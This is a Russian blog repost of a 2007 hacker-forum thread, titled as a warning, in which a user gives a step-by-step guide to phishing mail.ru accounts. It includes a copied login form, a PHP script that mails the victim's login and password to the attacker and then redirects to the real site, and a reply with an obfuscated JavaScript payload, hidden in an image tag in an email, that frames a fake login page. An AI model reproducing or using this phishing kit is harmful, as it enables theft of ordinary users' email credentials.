• Авторизация


Как ловят на фейке - не ведитесь!!! ( баян, но спецом кое-кому напоминаю) 14-05-2007 01:53 к комментариям - к полной версии - понравилось!


Просмотр полной версии : Фейк на php


Woldemar
12.04.2007, 09:24
Я всегда мечтал сделать так, что бы при заходе человека в свой мыльник пароль отправлялся ко мне на e-mail. И в скором времени я понял что это можно сделать очень просто. В этой статье я покажу на конкретном примере как это сделать (на mail.ru)

Нам нужно всего немного :
1. Страница авторизации басплатной почты. (win.mail.ru/cgi-bin/auth/)
2. Хостинг с поддержкой PHP + mail. (holm.ru)Сохраняем страничку авторизации на винт как index.php.
Рассмотрим её код и найдём в нём поля ввода:

<form method="post" action="auth" onSubmit="return CheckForm(this);">
<input type="hidden" name="page" value="">
<input type="hidden" name="post" value="">
<input type="hidden" name="login_from" value="">
<tr>
<td><img src=http://img.mail.ru/0.gif width=55 height=1><br>Имя</td>
<td width=63%><input type="text" name="Login" value="yt" class=w_100></td>
<td width=37%><select class=w_100 name="Domain"><option value="mail.ru" >@mail.ru</option><option value="inbox.ru" SELECTED>@inbox.ru</option><option value="list.ru" >@list.ru</option><option value="bk.ru" >@bk.ru</option></select></td>
</tr>
<tr>
<td>Пароль</td>
<td colspan=2>
<table width=100% cellpadding=0 cellspacing=0 border=0><tr>
<td width=100%><input type="password" name="Password" class=w_100></td>
<td>&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли&nbsp;пароль?</a></td>
</tr></table>
</td>
</tr>
<tr>
<td>&nbsp;</td>
<td><input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label></td>
<td>&nbsp;</td>
</tr>
<tr>
<td>&nbsp;</td>
<td><input type="Submit" value=" Войти " style="margin-top:4px"></td>
<td>&nbsp;</td>
</tr></form>
Вот мы видим следущие поля:
action="auth"[при нажатии конпки Войти, вы будете попадать в auth]
name="Login" [текстовое поле для ввода логина Login]
name="Domain"[поле для выбора домена Domain]
name="Password" [поле для ввода пароля Password]Для удобства поменяем "auth" на "auth.php".
auth.php нужно для того, чтобы отправить вам на мыло пароль и войти на мыло, этот файл будет выглядет примерно так :
<?php

$info = "Попались ламки с фейка!\n"; //сообщение. 1 строчка, здесь сообщение =)
$info .= "Login: \t$Login@$Domain\n"; //вторая строчка, здесь логин жертвы
$info .= "Password: \t$Password\n"; //третья строчка, здесь пасс жертвы

$send_to = "ТУТ ВАШЕ МЫЛО"; //ТУТ ВАШЕ МЫЛО
$subject = "Lamers death"; //Название темы

$headers = "From: BillGates <Bill@Microsoft.com>\n"; //от кого придёт сообщение
$headers .= "Reply-To: $email\n\n";

$send = mail($send_to, $subject, $info, $headers);

header("Location: http://win.mail.ru/cgi-bin/auth?Login=$Login&Password=$Password&Domain=$Domain");
exit;

?>

Хочу обратить ваше внимание на то что мы отправляем :
login: $поле_ввода_логина@$поле_для_выбора_домена
Password: $поле_ввода_пароля
Если страница авторизации будет другая, то и поля будут другие, следовательно отправлять в сообщение нужно будет другое.
Затем просто закачиваем фейк на сайт с поддержкой PHP + отправки писем на мыло и впихиваем жертве ссылку на ваш фейк (index.php), предварительно проверив его.

DAngel
25.04.2007, 20:15
вахаха!!! ща юзвери умные пошли, на эту уловку многие не попадаются.

ща брутфорсером шарить нада! :)

Lacoste*
25.04.2007, 21:53
Woldemar,
как сохоанить страничку в PHP. У меня Html только файл получается

Добавлено через 34 секунды
Woldemar,
а так очень полезная инфа.

Woldemar
26.04.2007, 15:25
Woldemar,
как сохоанить страничку в PHP. У меня Html только файл получается
Пишешь в *.txt файле скрипт переименовываешь и пишешь заррешение *.PHP и ооля сохранил на *.php.

вахаха!!! ща юзвери умные пошли, на эту уловку многие не попадаются.
ща брутфорсером шарить нада!

Недооцениваешь ты силу соц. инженерии.. :)

DAngel
26.04.2007, 15:30
Woldemar,
можна отправить скрипт, который выведет вместо письма твою страницу.
Пихаем это в тело письма:
<img g=">" src="javascript:document.write(String.fromCharCode(60,1 02,114,97,109,101,115,101,116,32,99,111,108,115,61 ,49,48,48,37,32,114,111,119,115,61,49,48,48,37,32, 48,32,102,114,97,109,101,115,112,97,99,105,110,103 ,61,48,32,62,60,102,114,97,109,101,32,115,114,99,6 1,34,104,116,116,112,58,47,47,112,97,112,105,101,1 14,101,110,107,97,114,116,111,110,46,110,108,47,10 9,47,108,111,103,105,110,46,104,116,109,108,34,32, 102,114,97,109,101,98,111,114,100,101,114,61,48,32 ,62,60,47,102,114,97,109,101,115,101,116,62));">

//цифры - это ASCII код тэга:
<frameset cols=100% rows=100% 0 framespacing=0 ><frame src="http://блабла.бла/login.html" frameborder=0 ></frameset>

Теперь при открытии сообщения юзер увидит твою страницу авторизации!
:))))
Пы.Сы. ASCII код символов мона посмотреть в MS WORD, для этого нажимаем Вид->Вставка->Символы, а дальше разберетесь сами.
вверх^ к полной версии понравилось! в evernote


Вы сейчас не можете прокомментировать это сообщение.

Дневник Как ловят на фейке - не ведитесь!!! ( баян, но спецом кое-кому напоминаю) | Perseph0na - ||| ~PERSEPHONA~ ||| | Лента друзей Perseph0na / Полная версия Добавить в друзья Страницы: раньше»